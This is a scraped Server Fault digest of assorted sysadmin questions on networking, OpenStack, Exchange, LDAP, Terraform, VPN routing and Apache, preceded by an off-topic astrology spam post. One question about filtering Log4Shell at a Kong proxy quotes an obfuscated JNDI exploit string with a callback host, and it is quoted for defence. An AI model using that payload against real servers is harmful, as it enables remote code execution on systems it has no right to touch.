Monday, December 13, 2021

Recent Questions - Server Fault


what is best astrologer?

Posted: 13 Dec 2021 02:19 AM PST

Astrology has long been considered a source of knowledge and wisdom, even in the realms of the material world. Through the ages it was regarded as a good source of self-knowledge. Astrology was conceived, and grew, in times when people believed that celestial bodies are closely linked with mankind and with what goes on in the terrestrial world. It is a philosophy that interconnects everything happening among living beings in the material and spiritual worlds. Contrary to the contemporary belief in biological accident, astrology holds to the theory of Karma, in which there is a purpose for every living being.

The birth chart (or horoscope) is one's individual map, showing character and personality and reflecting something bigger in the ever-changing wheel of the world. Astrology is an inward art that focuses on the experience one has in this world.

Existence of switch disturbs network: cable is fine straight to laptop but not through a switch

Posted: 13 Dec 2021 01:58 AM PST

This will be a bit complicated to read, but I hope it will be clear. English is not my first language, sorry.

In our school we have an HP 2530-24G switch connected to an unmanaged tp-link tl-sf1005d switch; we'll call the latter Switch 6. From this switch, the network expands through similar unmanaged switches in two directions, each branch running through classrooms. A PC in a room is connected like this: a cable comes into the room and goes into a tp-link switch, which connects the PC, and another cable runs out of that switch to the next classroom. So the switches are daisy-chained, with one switch in each classroom.

Now, when I got here, it all worked well. Then suddenly there was no network in branch 1. As it turned out, the cable from Switch 6 to the first switch of branch 1 was faulty, but I replaced the Ethernet connectors and it now tests good: when I plug it straight into a laptop, it works fine. But if there's a switch between the cable and the laptop, there's no network beyond the switch (the laptop shows a connection but I cannot ping other devices on the network). I tried 3 different switches and many patch cables, with no luck. I connected two PCs to the switch and they could ping each other.

The interesting thing is, when I connect the PC through a switch, there is a connection for a few seconds, just enough to load a webpage or ping something, then it goes away. Another mystery is that if a switch is connected, it disturbs the network on Switch 6 and the other branch. Straight-through versus crossover cabling shouldn't be an issue, because the tp-link tl-sf1005d is auto-MDIX as far as I know.

If anyone has a clue about what causes this, I'd appreciate it if they could share it... Thanks for your time.

Endre

How to tell compromised network users that their network is compromised

Posted: 13 Dec 2021 01:23 AM PST

Suppose I were to use Shodan and discover that someone is using "admin/admin" credentials for their router admin page. How can I tell them that? Is there a way to redirect their DNS queries to a page that says: please change your router password?

How to replace a complete folder with msp?

Posted: 13 Dec 2021 01:14 AM PST

We have an MSI in which only one folder needs to be changed. Is there any way to generate a patch (MSP) for this? When I checked in InstallShield, it shows the individual components.
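Outside InstallShield, one generic route is the Windows Installer SDK patching tools: author a .pcp (patch creation properties) file that points at administrative images of the old and new MSI, then build the MSP with msimsp.exe. A minimal sketch, with placeholder file names:

    rem Hedged sketch: patch.pcp must reference the original and the
    rem updated (folder-changed) administrative images of the MSI.
    msimsp.exe -s patch.pcp -p patch.msp -l patch.log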

Openstack Glance Image Corrupted

Posted: 13 Dec 2021 01:28 AM PST

I am currently migrating an OpenStack instance from one nova node to another, but this error occurs during the migration:

Image c4ef6b0a-a218-46d3-aea9-4ebc9c13f453 is unacceptable: Image has no associated data

The image is the official Ubuntu 20.04 qcow image.

It seems that the Glance image is corrupted, which causes the instance build to fail. The instance is currently in ERROR state. Is there any way I can repair the Glance image, without changing the image ID, and bring back my instance?
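If the image record is beyond repair, one hedged approach (assuming admin credentials and the python-openstackclient CLI) is to delete it and re-create it under the same UUID from the official cloud image, so existing references keep working:

    # Verify the image record, then re-create it with the original UUID.
    openstack image show c4ef6b0a-a218-46d3-aea9-4ebc9c13f453
    openstack image delete c4ef6b0a-a218-46d3-aea9-4ebc9c13f453
    openstack image create --id c4ef6b0a-a218-46d3-aea9-4ebc9c13f453 \
      --disk-format qcow2 --container-format bare \
      --file focal-server-cloudimg-amd64.img ubuntu-20.04

Whether nova will then rebuild the ERROR-state instance cleanly is a separate question; this only restores the image data under the same ID.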

Let me know if I need to provide further information.

Thanks in advance.

Installing ERPNext on CentOS 7 with Plesk

Posted: 13 Dec 2021 01:00 AM PST

I currently need to have ERPNext installed on a VPS.

My VPS is running on CentOS 7 with Plesk.

My problem is that I cannot get ERPNext installed at all.

I would like to have a domain, example.com, and then another domain, erp.example.com, where I can access the ERP.

I have tried to follow this tutorial: Single-bench tutorial, but I have not been successful due to the following error:

ERROR: for traefik  Cannot start service traefik: driver failed programming external connectivity on endpoint meigaserp_traefik_1 (048b682bf5e4b99ef588700a382460e2aaede7cd20aff689299598b775d5cfc3): Error starting userland proxy: listen tcp4 0.0.0.0:443: bind: address already in use  

I understand that this error occurs because Plesk is using port 443, so ERPNext cannot start there.

My question is: how can I keep Plesk and run ERPNext on a different port, accessible via a URL?
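One common way to sidestep the clash is to publish the compose stack's ports on alternates. A hedged sketch as a docker-compose override; the traefik service name matches the error above, but check it against the compose file the tutorial actually uses:

    # docker-compose.override.yml
    version: "3"
    services:
      traefik:
        ports:
          - "8080:80"
          - "8443:443"

You would then reach ERPNext on erp.example.com:8443, or put Plesk's own web server in front as a reverse proxy to that port.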

I have also tried a manual installation without Docker, but MariaDB is preinstalled on my machine because of Plesk and I always get errors at that part. That tutorial was: Install ERPNext on CentOS 7

I am a very inexperienced Linux user, and I have been stuck on this problem for several days. Thanks in advance for the help.

PowerDNS & Log4j

Posted: 13 Dec 2021 12:56 AM PST

I'm running PowerDNS on Linux. It looks like PowerDNS is vulnerable to the new Log4j exploit. Is there any way I can disable Log4j? From my research it looks like you can change the logging method to syslog, but I'm not quite sure how to do that.

OpenLDAP/ds-389 Secure Hardening Guide

Posted: 12 Dec 2021 10:41 PM PST

I am in the process of setting up an OpenLDAP server (389-ds); however, I cannot find many good resources that define a security or hardening guide applicable to the configuration or schema of the directory.

Does anyone have any good links or references that discuss how to appropriately harden an OpenLDAP server configuration?

I found a few references and an old CIS benchmark, but it seems CIS no longer provides a benchmark for OpenLDAP.

ISC Dhcpv6 addresses

Posted: 12 Dec 2021 10:38 PM PST

I recently set up a DHCPv6 server on my network. The problem is, I set its range to

    #VLAN120
    subnet6 2001:470:2249:120::/64 {
            range6 2001:470:2249:120::20 2001:470:2249:120::250;
            option dhcp6.name-servers 2606:4700:4700::1111;
            range6 2001:470:2249:120:: temporary;
    }

and there is only one client on my network that gets the ::250 address. Other clients don't get any addresses at all. What is the problem here?

In addition: I opened /var/log/syslog and noticed that two different clients have the same DUID. After setting one Ubuntu client to DHCP only and restarting the adapter, it gets the ::250 address. The other client (with the same DUID) gets the ::250 address for about 5 seconds and then it disappears, leaving that client with no IP address.
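Duplicate DUIDs usually point to cloned machines. On Ubuntu with systemd-networkd, the DUID is derived from /etc/machine-id, so a hedged fix (worth verifying against your setup) is to regenerate it on one of the clones:

    sudo rm /etc/machine-id
    sudo systemd-machine-id-setup   # generates a fresh machine-id
    sudo netplan apply              # or restart networking so a new DUID is used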

Network Design For My Application in Oracle Cloud

Posted: 12 Dec 2021 10:21 PM PST

I am trying to design the network for my application in the cloud; my cloud of choice here is Oracle Cloud. There will be two VMs in the same subnet (one master and one failover), both running the same web application in a Docker container, and a public IP that can be added to Cloudflare for routing traffic to. I am thinking of installing Keepalived for health checking and for routing traffic to the failover server: Keepalived will run a health check against a URL, and if no response is received from that URL, it will start routing traffic to the failover and send me an email notification about the problem.

So far so good theoretically but what I don't know is:

  1. How to route traffic received on public IP to floating IP of keepalived?
  2. Do I need any load balancer?
  3. Do I need HAProxy setup instead of load balancer since I have seen HAProxy being used with Keepalived?

I have tried googling this but did not find any good thread that helps.
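For reference, a minimal Keepalived sketch of the health-check-plus-floating-IP idea; the interface name, VIP and check script below are placeholders:

    # /etc/keepalived/keepalived.conf
    vrrp_script chk_app {
        script "/usr/local/bin/check_app.sh"   # e.g. curl the health URL, exit non-zero on failure
        interval 5
        fall 2
    }

    vrrp_instance VI_1 {
        state MASTER            # BACKUP on the failover VM
        interface ens3
        virtual_router_id 51
        priority 100            # lower on the failover VM
        virtual_ipaddress {
            10.0.0.100/24       # the floating (secondary private) IP
        }
        track_script {
            chk_app
        }
    }

One caveat: in most clouds (Oracle Cloud included) the floating address must also exist as a secondary private IP that is moved to the surviving VNIC, for example by a keepalived notify script calling the OCI CLI; plain VRRP gratuitous ARP alone is typically not honored.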

Use kong reverse proxy to filter log4j exploits

Posted: 12 Dec 2021 10:08 PM PST

I am using a Kong reverse proxy in front of every HTTP request to my web servers. I would like to mitigate the current Log4j problem ("Log4Shell") by finding and replacing the critical attacker strings like "jndi". For example, I found this in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

I think this could be accomplished by using the request-transformer plugin. Has anyone already done this?

P.S. Just replacing jndi with disabled is too far-reaching and breaks a lot of things.
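One caveat: as far as I can tell, request-transformer replaces whole headers or parameters by name rather than matching substrings, so a serverless pre-function plugin may be a better fit. A hedged Lua sketch that rejects requests carrying the literal jndi marker in any header:

    -- pre-function plugin body (access phase); assumes the Kong 2.x PDK.
    -- Multi-valued headers arrive as tables and are skipped here.
    local headers = kong.request.get_headers()
    for name, value in pairs(headers) do
      if type(value) == "string"
         and value:lower():find("${jndi", 1, true) then
        return kong.response.exit(400, { message = "request blocked" })
      end
    end

Obfuscated variants like the ${lower:...} example above would need extra normalization before matching; this only catches the plain marker.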

How to improve my current HA design

Posted: 12 Dec 2021 11:54 PM PST

I am trying to create a highly available application. My current design has two VMs: both have public IPs, both run in the same subnet, and both run the same web application in Docker. SSL certificates and traffic to the app in Docker are managed by Traefik. The first VM is the master, so its IP is set in Cloudflare. A third VM runs a script that hits the application via the first VM's IP to check whether it gets a response. If the script does not receive a response from the first VM, it sends an email notification about the problem and then updates Cloudflare with the public IP of the second (failover) VM so that traffic goes there.

This design works fine, but it is very rudimentary. I know it can be improved, but I am not sure how, so I need your suggestions. What I want is to run a health check of the app on the master VM and, if the app stops responding for any reason, route traffic to the failover VM. During my research I came across Keepalived; I have not looked into it yet, but I think it could be of some help.
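For reference, the DNS flip the script performs can be done with a single Cloudflare API call; the zone ID, record ID, hostname and token below are placeholders:

    # Point the A record at the failover VM's public IP.
    curl -X PUT "https://api.cloudflare.com/client/v4/zones/$ZONE_ID/dns_records/$RECORD_ID" \
      -H "Authorization: Bearer $CF_API_TOKEN" \
      -H "Content-Type: application/json" \
      --data '{"type":"A","name":"app.example.com","content":"203.0.113.2","ttl":60}'

The main weakness of DNS-based failover is propagation: even with a low TTL, clients may keep hitting the dead IP for a while, which is where a shared floating IP (as Keepalived provides) improves on this design.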

Why does Traefik renew with the expired Let's Encrypt certificate path?

Posted: 12 Dec 2021 11:39 PM PST

We run Ubuntu Server 20.04 LTS with a Traefik Docker container. Back in September, when the Let's Encrypt DST Root CA X3 certificate expired, we didn't really find much concrete information on how to remedy this, but eventually got it working again by updating Traefik to 2.5 and adding preferredChain: 'ISRG Root X1' to the configuration.

Last week the certificates were renewed and the invalid certificate path is back. Deleting acme.json and restarting Traefik fixes it again.

There don't seem to be any recent Google results with similar issues, so I assume our fix is simply incomplete or incorrect. What is the proper way to get Let's Encrypt working again?
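For comparison, the relevant static-configuration section (YAML form) that should pin the chain on renewal looks roughly like this; the resolver name and email are placeholders:

    certificatesResolvers:
      letsencrypt:
        acme:
          email: admin@example.com
          storage: /acme.json
          preferredChain: "ISRG Root X1"
          httpChallenge:
            entryPoint: web

If preferredChain only lives in a dynamic-configuration file, or was not actually passed to the container (e.g. as a CLI flag or environment variable), Traefik would renew with the default chain, which would match the symptom described.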

Exchange 2019 Antimalware engine updates download but don't get applied

Posted: 13 Dec 2021 02:05 AM PST

For the past day or so I've been diagnosing issues with an Exchange 2019 server related to antimalware filtering/scanning. This was disabled on our server; I enabled it and restarted the transport service per the Microsoft docs.

In Event Viewer, however, we're getting some logs that indicate this isn't working:

    Event 6031, FIPFS: MS Filtering Engine Update process has successfully downloaded updates for Microsoft.
    Event 6034, FIPFS: MS Filtering Engine Update process is testing the Microsoft scan engine update
    Event 6035, FIPFS: MS Filtering Engine Update process was unsuccessful in testing an engine update. Engine: Microsoft

It looks like it fails for some reason and logs "MS Filtering Engine Update process was unsuccessful in testing an engine update."

Then the process repeats and we can see it trying again:

    Event 7003, FIPFS: MS Filtering Engine Update process has successfully scheduled all update jobs.
    Event 6024, FIPFS: MS Filtering Engine Update process is checking for new engine updates. Scan Engine: Microsoft  Update Path: http://amupdatedl.microsoft.com/server/amupdate
    Event 6030, FIPFS: MS Filtering Engine Update process is attempting to download a scan engine update. Scan Engine: Microsoft  Update Path: http://amupdatedl.microsoft.com/server/amupdate
    Event 6031, FIPFS: MS Filtering Engine Update process has successfully downloaded updates for Microsoft.
    Event 6034, FIPFS: MS Filtering Engine Update process is testing the Microsoft scan engine update
    Event 6035, FIPFS: MS Filtering Engine Update process was unsuccessful in testing an engine update. Engine: Microsoft

The configuration settings look fine, and we've allowed both amupdatedl.microsoft.com and forefrontdl.microsoft.com through the firewall. (That part appears to be working, since the Event Viewer logs say the updates downloaded successfully.) Screenshot: Configuration Settings / Status.

Any ideas / help would be much appreciated! Thank you!

Edit: One other note: it does seem to be downloading and trying to use some of the scan engine updates, as evidenced by a staging folder with recent timestamps. Screenshot: Scan engine temp file downloads.

I also found some other resources that suggested a permissions issue, but I checked, and Network Service has full permissions to E:\Program Files\Microsoft\Exchange Server\V15\FIP-FS\Data.
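One more thing that might help pin it down: the FIP-FS engine can be driven manually from Exchange Management Shell via the Forefront filtering snap-in, which sometimes surfaces a more specific error than the 6035 event. A hedged sketch:

    Add-PSSnapin Microsoft.Forefront.Filtering.Management.PowerShell
    Get-EngineUpdateInformation   # last-checked/last-updated timestamps and update status
    Start-EngineUpdate            # force an immediate update attempt, then re-check the event log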

Things I've looked at:

Questions about Debian OpenLDAP configuration

Posted: 13 Dec 2021 12:47 AM PST

I have the slapd package (slapd/stable,now 2.4.57+dfsg-3 amd64) on Debian 11. I have read the official OpenLDAP documentation and the Debian article.

But I cannot understand the difference between the multiple configuration files.

I know the best practice is to use the dynamic OLC (OpenLDAP Configuration) method over the legacy slapd.conf static file.

I saw that the package ships with two other static configuration files:

  • /etc/default/slapd (can't find a doc about it)
  • /etc/ldap/ldap.conf (ldap.conf(5) which is a different doc from slapd.conf(5))

My first question is: do I have to use those static files, or is the OLC method sufficient?

Moreover, in the /etc/default/slapd file there is the SLAPD_SERVICES option, and in /etc/ldap/ldap.conf there is the URI option. Both are used to set connection methods.

What are the differences between these options, and how do they interact?
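For what it's worth, the two files operate at different layers: /etc/default/slapd feeds the init scripts and controls what the server listens on, while /etc/ldap/ldap.conf sets defaults for client tools (ldapsearch, ldapmodify, and other libldap consumers). A sketch of both, with placeholder values:

    # /etc/default/slapd -- server-side: the listener URLs slapd is started with
    SLAPD_SERVICES="ldap://127.0.0.1:389/ ldapi:///"

    # /etc/ldap/ldap.conf -- client-side defaults for LDAP tools and libraries
    URI  ldap://localhost
    BASE dc=example,dc=com

So they don't really compete: OLC replaces slapd.conf for the server's runtime configuration, but both of these files are typically still used alongside it.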

Thank you.

Subnet is not creating with terraform on azure, how to fix it?

Posted: 12 Dec 2021 11:33 PM PST

I am trying to create two CentOS 8 machines with Terraform on Azure.

My templates github link

When I try to apply, I get the below error related to policy. Could you please suggest how to fix this?

    Error: creating Subnet: (Name "subnetforAutomation" / Virtual Network Name "vnetforAutomation" / Resource Group "automation_mart"):
    network.SubnetsClient#CreateOrUpdate: Failure sending request: StatusCode=0 --
    Original Error: Code="RequestDisallowedByPolicy"
    Message="Resource 'subnetforAutomation' was disallowed by policy. Policy identifiers:
    '[{\"policyAssignment\":{\"name\":\"Deny-Subnet-Without-Nsg\",\"id\":\"/providers/Microsoft.Management/managementGroups/QSFT-landingzones/providers/Microsoft.Authorization/policyAssignments/Deny-Subnet-Without-Nsg\"},
      \"policyDefinition\":{\"name\":\"Subnets should have a Network Security Group\",\"id\":\"/providers/Microsoft.Management/managementGroups/QSFT/providers/Microsoft.Authorization/policyDefinitions/Deny-Subnet-Without-Nsg\"}}]'"
    Target="subnetforAutomation"
    AdditionalInfo=[{"info":{"evaluationDetails":{"evaluatedExpressions":[
      {"expression":"type","expressionKind":"Field","expressionValue":"Microsoft.Network/virtualNetworks/subnets","operator":"Equals","path":"type","result":"True","targetValue":"Microsoft.Network/virtualNetworks/subnets"},
      {"expression":"Microsoft.Network/virtualNetworks/subnets/networkSecurityGroup.id","expressionKind":"Field","operator":"Exists","path":"properties.networkSecurityGroup.id","result":"True","targetValue":"false"}]},
      "policyAssignmentDisplayName":"Deny-Subnet-Without-Nsg",
      "policyAssignmentId":"/providers/Microsoft.Management/managementGroups/QSFT-landingzones/providers/Microsoft.Authorization/policyAssignments/Deny-Subnet-Without-Nsg",
      "policyAssignmentName":"Deny-Subnet-Without-Nsg",
      "policyAssignmentScope":"/providers/Microsoft.Management/managementGroups/QSFT-landingzones",
      "policyDefinitionDisplayName":"Subnets should have a Network Security Group",
      "policyDefinitionEffect":"Deny",
      "policyDefinitionId":"/providers/Microsoft.Management/managementGroups/QSFT/providers/Microsoft.Authorization/policyDefinitions/Deny-Subnet-Without-Nsg",
      "policyDefinitionName":"Deny-Subnet-Without-Nsg"},"type":"PolicyViolation"}]

      with azurerm_subnet.subnet,
      on main.tf line 24, in resource "azurerm_subnet" "subnet":
      24: resource "azurerm_subnet" "subnet" {
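The error itself points at the fix: the Deny-Subnet-Without-Nsg assignment rejects any subnet created without an NSG attached. Because a standalone azurerm_subnet plus a separate association resource creates the subnet first (and is denied at that step), one hedged workaround is to define the subnet inline in the virtual network with its security group set in the same request; resource names and address ranges below are illustrative, and the inline security_group argument is as of azurerm provider 2.x:

    resource "azurerm_network_security_group" "subnet_nsg" {
      name                = "nsg-subnetforAutomation"
      location            = azurerm_resource_group.rg.location
      resource_group_name = azurerm_resource_group.rg.name
    }

    resource "azurerm_virtual_network" "vnet" {
      name                = "vnetforAutomation"
      address_space       = ["10.0.0.0/16"]
      location            = azurerm_resource_group.rg.location
      resource_group_name = azurerm_resource_group.rg.name

      # Inline subnet so the NSG is present in the same create request.
      subnet {
        name           = "subnetforAutomation"
        address_prefix = "10.0.1.0/24"
        security_group = azurerm_network_security_group.subnet_nsg.id
      }
    }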

Using a DNS server with ZeroTier

Posted: 13 Dec 2021 12:21 AM PST

I have set up my own ZeroTier controller using ztncui and it works great, but there is one piece of my setup that I cannot seem to get working: having clients use the DNS server I configure for the ZeroTier network. The DNS is configured as follows:

{    "domain": "",    "servers": [      "10.10.14.26"    ]  }  

where 10.10.14.26 is the ZeroTier IP address of the DNS server (just a Linux server running dnsmasq, forwarding to the local router). Whenever I test the responses of the DNS server directly on a ZeroTier client, I do get the correct results (e.g. configuring my DNS to use it directly, or specifying the server when using dig). However, when "Allow DNS Configuration" is selected on the clients, they still refuse to resolve hostnames that do get resolved when asking the DNS server directly.

I also tried using the local IP address of the DNS server rather than the ZeroTier IP, with the same results (IP forwarding is set up on that same Linux server so that clients can reach the local IPs too).
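One detail that may be relevant: as far as I can tell, ZeroTier's managed DNS on Windows and macOS is applied as a split-DNS rule scoped to the configured search domain, so with "domain" left empty the pushed servers may never be consulted. A variant worth trying, where the domain is a placeholder for whatever suffix your internal hostnames use:

    {
        "domain": "home.example.com",
        "servers": [
            "10.10.14.26"
        ]
    }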

What do I need to do to make sure my ZeroTier clients will use the DNS server I have configured?

My backup plan is to write various scripts for the different platforms I need to support and have them overwrite and restore the global DNS when connecting to and disconnecting from my ZeroTier network, but then what is the use of the "Allow DNS Configuration" option?

I know the DNS feature does not work for Linux clients, but I will be the only Linux client, so this isn't much of a problem for me. The rest of the clients will use either Windows or MacOS, for which this feature is reported to work:

ZeroTier managed DNS is currently only supported on Windows, MacOS, Android, and iOS. Linux support is forthcoming but may be limited to common Linux DNS resolver configurations such as those found in Debian and CentOS/RHEL.

Persistent storage in EKS cluster with multiple availability zones

Posted: 13 Dec 2021 12:06 AM PST

I have an EKS cluster with one Linux worker node, which may be instantiated in any availability zone within a region. I need to use a persistent storage volume so my data won't be lost if the node dies. For context, this is RabbitMQ data.

I've tried using an EBS volume, but it has a hard limitation: it is bound to a single availability zone. If the node dies and then comes back up in a different AZ, it fails to mount the EBS volume.

So far I have the following ideas:

  1. Have a single EBS volume attached to a worker node. When the worker node restarts in a different Availability Zone, create an EBS snapshot, and use it to create a new EBS volume in the correct Availability Zone. The new node instance will mount the new EBS volume.

  2. Have a worker node for each Availability Zone, with a dedicated EBS volume. RabbitMQ can automatically duplicate the data across the EBS volumes. This eliminates the need for using EBS snapshots, as suggested in solution 1.

  3. Have a single EFS volume which can be attached to multiple nodes across all Availability Zones.

In addition, I came across this post which explains more sophisticated approaches for my issue:

The other option I would recommend for Kubernetes 1.10/1.11 is to control where your volumes are created and where your pods are scheduled:
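A minimal sketch of that approach with the EBS CSI driver: a StorageClass with WaitForFirstConsumer delays volume creation until the pod is scheduled, so the volume is created in (and the pod stays pinned to) that pod's AZ:

    apiVersion: storage.k8s.io/v1
    kind: StorageClass
    metadata:
      name: ebs-topology-aware
    provisioner: ebs.csi.aws.com
    volumeBindingMode: WaitForFirstConsumer

Note this prevents the AZ-mismatch mount failure rather than making the volume multi-AZ; options 2 (RabbitMQ mirroring across per-AZ nodes) and 3 (EFS) are the ones that would actually survive the loss of a whole AZ.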

Can you help me compare these approaches, for example in terms of scalability, cost-efficiency and maintainability? Or perhaps you can think of a better one?

Windows RAS-VPN: cannot reach the entire network

Posted: 13 Dec 2021 02:05 AM PST

We set up a Windows Server 2019 machine as a VPN server that should grant access to a /22 network. It has a single Ethernet connection to the network 192.168.32.0/22 (spanning up to 192.168.35.255). The server's IP is 192.168.33.47 and the RAS connection has 192.168.33.201.

But when opening the VPN connection (split tunneling enabled), I can only reach hosts in 192.168.33.0/24. The remainder of the network is not reachable.

What do I need to change on the RAS-Server in order to reach the entire network?

The issue seems to be the routing-table (192.168.110.1 is the remote computer's gateway):

    route print -4

    Network destination        Netmask          Gateway         Interface        Metric
              0.0.0.0          0.0.0.0    192.168.110.1    192.168.110.12       25
         192.168.33.0    255.255.255.0   192.168.33.200    192.168.33.208       26
    (...)

Requests to 192.168.32.0/24 are thus routed to the local gateway 192.168.110.1 instead of 192.168.33.200.

PowerShell confirms this:

    Find-NetRoute -RemoteIPAddress "192.168.33.5"
    (...)
    NextHop : 192.168.33.200 (good!)

    Find-NetRoute -RemoteIPAddress "192.168.32.5"
    (...)
    NextHop : 192.168.110.1 (wrong!)

Of course, I can edit the routing table manually:

    route add 192.168.32.0 MASK 255.255.255.0 192.168.33.200 METRIC 26

The whole target network is reachable after that. But surely it cannot be the solution to edit the routing table on each client.

What do I need to change on the server-side in order to get this to work automatically?

Thank you very much!

Edit: As requested, a screenshot of the configuration of the static route that I tried.

Apache 2.4 - how to use multiple files in files directive?

Posted: 13 Dec 2021 01:11 AM PST

I can't find any info about it in the official documentation.

I am trying to allow access to two PHP files, A.php and B.php.

<Files "A.php">      Require all granted  </Files>    <Files "B.php">      Require all granted  </Files>  

Does it work like this, or is there a better solution?
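The two <Files> blocks should work as written, and an equivalent single block can be written with FilesMatch and a regex alternation:

    <FilesMatch "^(A|B)\.php$">
        Require all granted
    </FilesMatch>

Both forms are standard in Apache 2.4; FilesMatch just scales better as the list of files grows.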

Benefits of using WEF instead of SIEM collectors

Posted: 12 Dec 2021 11:08 PM PST

Aside from avoiding the deployment overhead of a log collector agent on the servers from which I want to collect events (via GPO, SCCM, etc.), are there any added benefits to using Windows Event Forwarding to feed my SIEM?

Resource calendar with approval sending approval emails with "No response required"

Posted: 13 Dec 2021 01:01 AM PST

[Note: this appeared to be the most applicable Stack site to post this into - apologies if wrong]

Strange situation: I've configured a resource calendar in Office 365 to act as a shared holiday calendar, with myself approving and rejecting requests made to the calendar. This works perfectly if an individual generates a calendar request in the resource calendar.

However, if they invite the room resource to an existing meeting request or appointment in their own calendar, I receive an email explicitly stating that "this in-policy resource request was forwarded to you for your approval", but the "Accept" and "Reject" buttons are not shown, only "No Response Required".

My thinking is that the user, by creating the request in their own calendar, has automatically accepted it. By updating their own request to include the resource, Exchange / Office 365 does not create a new approvable request in the resource calendar (which would generate the approval email); it simply updates their request, which cannot be approved from the resource calendar.

I've been through the various settings, but cannot find a solution.
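One avenue that may be worth checking is the resource mailbox's calendar-processing settings in Exchange Online PowerShell, since requiring delegate approval for in-policy requests is controlled there. A hedged sketch, where "HolidayCal" is a placeholder for the resource mailbox:

    Get-CalendarProcessing -Identity "HolidayCal" |
      Format-List AutomateProcessing, AllBookInPolicy, AllRequestInPolicy, ResourceDelegates

    # Require delegate approval even for in-policy requests:
    Set-CalendarProcessing -Identity "HolidayCal" `
      -AutomateProcessing AutoAccept `
      -AllBookInPolicy $false `
      -AllRequestInPolicy $true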

Thanks in advance.

apache connection was reset while the page was loading on windows 2008 server

Posted: 13 Dec 2021 12:06 AM PST

I'm running a PHP script on a Windows 2008 server using XAMPP. The script works normally until I open certain pages; while a page is loading, I get this error in Firefox:

The connection to the server was reset while the page was loading.

The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.

When I check the php logs I get nothing, in apache logs I always find this after getting the problem:

    [Fri Jun 12 11:37:02.076599 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00428: Parent: child process 3048 exited with status 255 -- Restarting.
    [Fri Jun 12 11:37:08.144999 2015] [ssl:warn] [pid 3868:tid 336] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name
    [Fri Jun 12 11:37:08.878199 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00455: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.5.24 configured -- resuming normal operations
    [Fri Jun 12 11:37:08.878199 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00456: Apache Lounge VC11 Server built: Jan 28 2015 16:48:40
    [Fri Jun 12 11:37:08.878199 2015] [core:notice] [pid 3868:tid 336] AH00094: Command line: 'C:\\xampp\\apache\\bin\\httpd.exe -d C:/xampp/apache'
    [Fri Jun 12 11:37:08.909399 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00418: Parent: Created child process 3736
    [Fri Jun 12 11:37:10.157399 2015] [ssl:warn] [pid 3736:tid 268] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name
    [Fri Jun 12 11:37:10.469399 2015] [ssl:warn] [pid 3736:tid 268] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name
    [Fri Jun 12 11:37:10.609799 2015] [mpm_winnt:notice] [pid 3736:tid 268] AH00354: Child: Starting 150 worker threads.

I disabled the firewall, changed the port, and increased the memory limit, all without any result.
I made a backup of the script and moved it to my laptop running Windows 7; the problem disappeared and the script started working normally.

So is this problem caused by Apache? And how can I fix it?

After many tests, I found that it happens only in Firefox; it works normally in Google Chrome. I cleared all cache and history in Firefox, but that didn't help. I don't know what the problem is exactly, so for now I'm working with Chrome and ignoring Firefox. Any suggestion would be appreciated.

VCenter Adding Host - Error "conflicts with an existing datastore in the datacenter that has the same URL"

Posted: 12 Dec 2021 10:04 PM PST

We have a new Dell VRTX box (2 blades & shared storage). We are getting the above error when trying to add the second host. We've created shared storage (VDISK1) to which both ESX hosts have access.

ESX Host1

  • Shared Storage (VDISK1)
  • vCenter Server (Appliance)

ESX Host2

  • Shared Storage (VDISK1)

Searching the net suggested unmounting the storage from the second host prior to adding it to vCenter Server, but that has not worked. Any other suggestions would be appreciated.

Thank You, Eric

** SOLVED **

Just in case anyone else runs into this: we ended up having to rebuild the problem host. Once rebuilt, we added it to the datacenter, then installed the storage driver and added the shared storage.

openstack installation on ubuntu. Neutron connection issue

Posted: 13 Dec 2021 01:01 AM PST

I am trying to configure OpenStack on a single node by following this tutorial: http://docs.openstack.org/juno/install-guide/install/apt/content/neutron-controller-node.html

My installation is done in a Virtual Machine.

My /etc/hosts is:

    root@openstack:~/openstack# cat /etc/hosts
    127.0.0.1   localhost
    127.0.0.1   openstack
    127.0.0.1   controller
    127.0.0.1   network
    127.0.0.1   compute1

I passed all the steps successfully until the Neutron installation: http://docs.openstack.org/juno/install-guide/install/apt/content/neutron-controller-node.html

I have a connection issue with neutron:

    root@openstack:~/openstack# neutron ext-list
    Unable to establish connection to http://controller:9696/v2.0/extensions.json

When I activate the debug option, I get the following trace:

    root@openstack:~/openstack# neutron ext-list --debug
    DEBUG: keystoneclient.session REQ: curl -i -X GET http://controller:35357/v2.0 -H "Accept: application/json" -H "User-Agent: python-keystoneclient"
    DEBUG: keystoneclient.session RESP: [200] {'date': 'Mon, 15 Dec 2014 16:59:05 GMT', 'vary': 'X-Auth-Token', 'content-length': '421', 'content-type': 'application/json', 'x-distribution': 'Ubuntu'}
    RESP BODY: {"version": {"status": "stable", "updated": "2014-04-17T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v2.0+json"}, {"base": "application/xml", "type": "application/vnd.openstack.identity-v2.0+xml"}], "id": "v2.0", "links": [{"href": "http://controller:35357/v2.0/", "rel": "self"}, {"href": "http://docs.openstack.org/", "type": "text/html", "rel": "describedby"}]}}

    DEBUG: stevedore.extension found extension EntryPoint.parse('table = cliff.formatters.table:TableFormatter')
    DEBUG: stevedore.extension found extension EntryPoint.parse('csv = cliff.formatters.commaseparated:CSVLister')
    DEBUG: neutronclient.neutron.v2_0.extension.ListExt get_data(Namespace(columns=[], fields=[], formatter='table', max_width=0, quote_mode='nonnumeric', request_format='json', show_details=False))
    DEBUG: keystoneclient.auth.identity.v2 Making authentication request to http://controller:35357/v2.0/tokens
    DEBUG: keystoneclient.session REQ: curl -i -X GET http://controller:9696/v2.0/extensions.json -H "User-Agent: python-neutronclient" -H "Accept: application/json" -H "X-Auth-Token: ded80764051740a58da4bb80543cd69f"
    ERROR: neutronclient.shell Unable to establish connection to http://controller:9696/v2.0/extensions.json
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/neutronclient/shell.py", line 691, in run_subcommand
        return run_command(cmd, cmd_parser, sub_argv)
